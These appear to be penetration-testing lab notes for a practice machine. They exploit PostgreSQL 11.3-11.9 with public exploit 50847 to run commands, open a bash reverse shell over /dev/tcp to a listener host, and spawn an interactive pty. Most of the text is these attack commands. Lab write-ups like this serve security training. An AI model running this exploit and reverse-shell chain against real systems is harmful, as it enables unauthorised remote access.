looking for public exploit. [Initial access]
postgresql db 11.3 - 11.9 exploitRunning the exploit

Trying for the shell worked

Last updated
postgresql db 11.3 - 11.9 exploit

Last updated
searchsploit -m 50847python3 50847.py --ip $nibbles --port 5437 --command whoami# start listener in kali linux
sudo rlwrap nc -lnvp 80
# run the exploit again with bash command:
python3 50847.py --ip $nibbles --port 5437 --command 'bash -c "bash -i >& /dev/tcp/192.168.45.242/80 0>&1"'(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')